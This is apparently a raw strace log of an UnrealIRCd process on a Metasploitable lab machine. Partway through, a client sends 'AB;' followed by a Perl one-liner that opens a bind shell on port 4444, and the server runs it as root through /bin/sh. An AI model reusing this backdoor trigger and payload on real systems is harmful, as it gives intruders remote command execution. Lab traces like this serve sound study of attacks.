4519  07:18:51.091640 select(1024, [2 3 4 7 9], [], NULL, {0, 480000}) = 1 (in [7], left {0, 380000})

4519  07:18:51.186675 clock_gettime(CLOCK_MONOTONIC, {1541, 3704136}) = 0

4519  07:18:51.186717 recv(7, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45

4519  07:18:51.186758 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186778 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186793 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186807 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186821 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186835 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186849 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186863 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186876 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186890 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186904 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186917 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186931 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186945 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186958 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186972 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186986 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.186999 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.187013 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.187042 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.187085 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.187113 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.187130 time(NULL)        = 1495624731

4519  07:18:51.187143 time(NULL)        = 1495624731

4519  07:18:51.187159 gettimeofday({1495624731, 187163}, NULL) = 0

4519  07:18:51.187172 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:18:51.187215 clock_gettime(CLOCK_MONOTONIC, {1541, 4228351}) = 0

4519  07:18:51.187226 gettimeofday({1495624731, 187229}, NULL) = 0

4519  07:18:51.187237 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 940000})

4519  07:18:51.248176 clock_gettime(CLOCK_MONOTONIC, {1541, 65198021}) = 0

4519  07:18:51.248212 accept(2, 0, NULL) = 5

4519  07:18:51.248233 getpeername(5, {sa_family=AF_INET, sin_port=htons(38535), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:18:51.248266 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:18:51.248279 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:18:51.248292 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:18:51.248305 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:18:51.248330 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:18:51.248341 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:18:51.248353 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:18:51.248369 clock_gettime(CLOCK_MONOTONIC, {1541, 65382275}) = 0

4519  07:18:51.248381 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:18:51.248392 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:18:51.248402 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:18:51.248411 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:18:51.248421 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:18:51.248437 send(6, "\261f\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:18:51.249264 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:18:51.249432 gettimeofday({1495624731, 249441}, NULL) = 0

4519  07:18:51.249451 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:18:51.254139 clock_gettime(CLOCK_MONOTONIC, {1541, 71155751}) = 0

4519  07:18:51.254175 recvfrom(6, "\261f\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\354\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:18:51.254298 close(6)          = 0

4519  07:18:51.254316 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:18:51.254333 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:18:51.254402 time(NULL)        = 1495624731

4519  07:18:51.254415 time(NULL)        = 1495624731

4519  07:18:51.254446 gettimeofday({1495624731, 254450}, NULL) = 0

4519  07:18:51.254474 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:18:51.254502 clock_gettime(CLOCK_MONOTONIC, {1541, 71515433}) = 0

4519  07:18:51.254513 gettimeofday({1495624731, 254516}, NULL) = 0

4519  07:18:51.254542 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [7], left {0, 570000})

4519  07:18:51.675794 clock_gettime(CLOCK_MONOTONIC, {1541, 492803598}) = 0

4519  07:18:51.675795 recv(7, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71

4519  07:18:51.675795 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675795 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675808 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675822 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675835 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675849 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675863 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675876 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675889 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675903 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675916 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675929 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675943 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675956 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675969 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675983 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.675996 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.676009 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.676023 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.676036 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.676050 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.676077 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:51.676121 gettimeofday({1495624731, 676125}, NULL) = 0

4519  07:18:51.676149 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:18:51.676190 clock_gettime(CLOCK_MONOTONIC, {1541, 493202871}) = 0

4519  07:18:51.676208 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:18:51.676236 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:18:51.676257 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:18:51.676269 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:18:51.676284 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 7457

7457  07:18:51.676365 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

7457  07:18:51.676379 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

7457  07:18:51.676390 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7457  07:18:51.676403 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

7457  07:18:51.676505 brk(0)            = 0x80f9000

7457  07:18:51.676527 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7457  07:18:51.676543 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f2f000

7457  07:18:51.676571 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7457  07:18:51.676618 open("/etc/ld.so.cache", O_RDONLY) = 1

7457  07:18:51.676648 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7457  07:18:51.676683 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f27000

7457  07:18:51.676694 close(1)          = 0

7457  07:18:51.676704 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7457  07:18:51.676720 open("/lib/libncurses.so.5", O_RDONLY) = 1

7457  07:18:51.676732 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

7457  07:18:51.676825 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

7457  07:18:51.676842 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef7000

7457  07:18:51.676854 mmap2(0xb7f24000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f24000

7457  07:18:51.676871 close(1)          = 0

7457  07:18:51.676883 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7457  07:18:51.676897 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7457  07:18:51.676911 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7457  07:18:51.677002 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7457  07:18:51.677019 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef3000

7457  07:18:51.677031 mmap2(0xb7ef5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ef5000

7457  07:18:51.677046 close(1)          = 0

7457  07:18:51.677069 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7457  07:18:51.677113 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7457  07:18:51.677127 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7457  07:18:51.677248 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7457  07:18:51.677265 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef2000

7457  07:18:51.677279 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da3000

7457  07:18:51.677290 mmap2(0xb7eec000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eec000

7457  07:18:51.677304 mmap2(0xb7eef000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eef000

7457  07:18:51.677318 close(1)          = 0

7457  07:18:51.677340 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7da2000

7457  07:18:51.677351 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7da26b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7457  07:18:51.677406 mprotect(0xb7eec000, 4096, PROT_READ) = 0

7457  07:18:51.677442 munmap(0xb7f27000, 29913) = 0

7457  07:18:51.677467 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7457  07:18:51.677481 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

7457  07:18:51.677501 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbff148d0) = -1 ENOTTY (Inappropriate ioctl for device)

7457  07:18:51.677531 brk(0)            = 0x80f9000

7457  07:18:51.677541 brk(0x80fa000)    = 0x80fa000

7457  07:18:51.677563 brk(0x80fb000)    = 0x80fb000

7457  07:18:51.677608 getuid32()        = 0

7457  07:18:51.677617 getgid32()        = 0

7457  07:18:51.677626 geteuid32()       = 0

7457  07:18:51.677654 getegid32()       = 0

7457  07:18:51.677668 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7457  07:18:51.677685 time(NULL)        = 1495624731

7457  07:18:51.677698 brk(0x80fc000)    = 0x80fc000

7457  07:18:51.677712 brk(0x80fd000)    = 0x80fd000

7457  07:18:51.677731 open("/proc/meminfo", O_RDONLY) = 1

7457  07:18:51.677752 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

7457  07:18:51.677770 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f2e000

7457  07:18:51.677781 read(1, "MemTotal:      1035240 kB\nMemFree:        555520 kB\nBuffers:         64784 kB\nCached:         258100 kB\nSwapCached:          0 kB\nActive:         254036 kB\nInactive:       197784 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        555280 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4444 kB\nWriteback:           0 kB\nAnonPages:      128988 kB\nMapped:          52008 kB\nSlab:            16560 kB\nSReclaimable:     8388 kB\nSUnreclaim:       8172 kB\nPageTables:       1976 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

7457  07:18:51.677863 close(1)          = 0

7457  07:18:51.677874 munmap(0xb7f2e000, 4096) = 0

7457  07:18:51.677885 brk(0x80fe000)    = 0x80fe000

7457  07:18:51.677911 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7457  07:18:51.677924 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7457  07:18:51.677936 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7457  07:18:51.677948 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7457  07:18:51.677959 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

7457  07:18:51.677971 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

7457  07:18:51.677984 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7457  07:18:51.677995 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7457  07:18:51.678008 uname({sys="Linux", node="metasploitable", ...}) = 0

7457  07:18:51.678138 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

7457  07:18:51.678185 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7457  07:18:51.678220 brk(0x8100000)    = 0x8100000

7457  07:18:51.678232 getcwd("/etc/unreal", 4096) = 12

7457  07:18:51.678246 getpid()          = 7457

7457  07:18:51.678262 getppid()         = 4519

7457  07:18:51.678278 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7457  07:18:51.678298 stat64("/sbin/sh", 0xbff148a8) = -1 ENOENT (No such file or directory)

7457  07:18:51.678310 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7457  07:18:51.678327 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7457  07:18:51.678350 socket(PF_FILE, SOCK_STREAM, 0) = 1

7457  07:18:51.678363 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7457  07:18:51.678375 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7457  07:18:51.678396 close(1)          = 0

7457  07:18:51.678407 socket(PF_FILE, SOCK_STREAM, 0) = 1

7457  07:18:51.678417 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7457  07:18:51.678427 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7457  07:18:51.678445 close(1)          = 0

7457  07:18:51.678459 open("/etc/nsswitch.conf", O_RDONLY) = 1

7457  07:18:51.678472 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

7457  07:18:51.678489 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f2e000

7457  07:18:51.678500 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

7457  07:18:51.678552 read(1, "", 4096) = 0

7457  07:18:51.678562 close(1)          = 0

7457  07:18:51.678571 munmap(0xb7f2e000, 4096) = 0

7457  07:18:51.678587 open("/etc/ld.so.cache", O_RDONLY) = 1

7457  07:18:51.678599 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7457  07:18:51.678615 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f27000

7457  07:18:51.679417 close(1)          = 0

7457  07:18:51.679474 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7457  07:18:51.679512 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

7457  07:18:51.679527 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 